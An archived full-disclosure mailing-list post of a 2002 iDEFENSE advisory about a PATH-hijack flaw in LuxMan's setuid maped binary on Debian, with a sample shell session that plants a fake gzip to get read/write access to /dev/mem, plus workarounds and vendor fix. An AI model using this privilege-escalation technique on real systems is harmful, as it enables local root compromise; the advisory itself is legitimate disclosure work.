iDEFENSE Security Advisory 11.06.02: Non-Explicit Path Vulnerability in LuxMan

From: David Endler (dendlerat_private)
Date: Wed Nov 06 2002 - 08:56:34 PST

Next message: SGI Security Coordinator: "[Full-Disclosure] IRIX ToolTalk rpc.ttdbserverd vulnerabilities"

Previous message: Chris Wysopal: "Re: [Full-Disclosure] Re: Oracle Security Contact"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 11.06.02:
http://www.idefense.com/advisory/11.06.02.txt
Non-Explicit Path Vulnerability in LuxMan
November 6, 2002

I. BACKGROUND

Frank McIngvale's LuxMan is a Linux-based game similar to Pac Man.
More information about it is available at 
http://packages.debian.org/stable/games/luxman.html.

II. DESCRIPTION

Maped is a setuid binary that belongs to LuxMan. It executes gzip
without using the full path. A local attacker can create an 
exploit binary named gzip and have maped execute it by properly
modifying the path environment variable. The following is a 
sample run and explanation of an exploit that will duplicate /dev/mem
to /tmp/mem:

First, the attacker sets the current working directory into the path
environment variable:

farmer@debian30:~$ export | grep PATH declare -x
PATH="/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
farmer@debian30:~$ declare -x
PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
farmer@debian30:~$ export | grep PATH declare -x
PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games" 

Second, the attacker compiles the exploit as a binary named gzip and
creates a fake archive:

farmer@debian30:~$ cc gzip.c -o gzip
farmer@debian30:~$ touch test.gz 

Third, the attacker executes the maped binary:

farmer@debian30:~$ `which maped` test.gz
You must be the owner of the current console to use svgalib.
Not running in a graphics capable console,
and unable to find one.
Using VGA driver.
svgalib 1.4.3
...

At this point, /dev/mem is being duplicated into /dev/tmp. The
descriptor to /dev/mem can be analyzed in a separate terminal:

farmer@debian30:~$ lsof | grep /dev/mem
gzip 5197 farmer 5u CHR 1,1 178294 /dev/mem

farmer@debian30:~$ cd /proc/5197/fd/
farmer@debian30:~$ ls -l
total 0
lrwx------ 1 farmer farmer 64 Oct 10 05:56 0 -> /dev/pts/1
l-wx------ 1 farmer farmer 64 Oct 10 05:56 1 -> pipe:[4991]
lrwx------ 1 farmer farmer 64 Oct 10 05:56 2 -> /dev/pts/1
lrwx------ 1 farmer farmer 64 Oct 10 05:56 3 -> /tmp/mem
lr-x------ 1 farmer farmer 64 Oct 10 05:56 4 -> /dev/zero
lrwx------ 1 farmer farmer 64 Oct 10 05:56 5 -> /dev/mem

It is clear that descriptor 5 is a read write descriptor to /dev/mem.

III. ANALYSIS

Any local user can launch this attack to gain read/write access to
/dev/mem. Such access can lead to local root compromise. 
Exploitation is possible by scanning the file for fragments of the
master password file and modifying kernel memory to re-map 
system calls.

IV. DETECTION

LuxMan 0.41, which is packaged and distributed with Debian Linux
3.0r0, is vulnerable. It is probable that the same LuxMan 
version is vulnerable on other platforms as well.

V. WORKAROUND

Customers should consider one of the two following options:

Option 1: Remove the LuxMan package by issuing the command "# apt-get
remove luxman".

Option 2: Remove the setuid bit from the maped binary by executing
the command "# chmod -s `which maped`".

VI. VENDOR RESPONSE

The Debian Project has made available an updated LuxMan package that
fixes this vulnerability. More information should be 
available in DSA-189 at http://www.debian.org/security/2002/dsa-189 .
 
VII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
assigned the identification number CAN-2002-1245 to this 
issue.

VIII. DISCLOSURE TIMELINE

10/03/2002	Issue disclosed to iDEFENSE
10/31/2002	Maintainer, Janos Lenart (ocsiat_private), and 
		securityat_private notified
10/31/2002	iDEFENSE clients notified
11/02/2002	Responses received from ocsiat_private and Martin Schulze
		(joeyat_private)
11/06/2002	Public disclosure

IX. CREDIT

Texonet (http://www.texonet.com) discovered this vulnerability.



Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to listservat_private, subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide 
decision-makers, frontline security professionals and network 
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com.


- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendlerat_private
www.idefense.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPclF1UrdNYRLCswqEQLR5ACgyXFDjuXKXSkUb7pa4GGMEk+3GGsAn0Hf
feitp98Q3xxQr1bg1oMwIUBs
=WLLe
-----END PGP SIGNATURE-----

Next message: SGI Security Coordinator: "[Full-Disclosure] IRIX ToolTalk rpc.ttdbserverd vulnerabilities"
Previous message: Chris Wysopal: "Re: [Full-Disclosure] Re: Oracle Security Contact"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Nov 06 2002 - 14:55:31 PST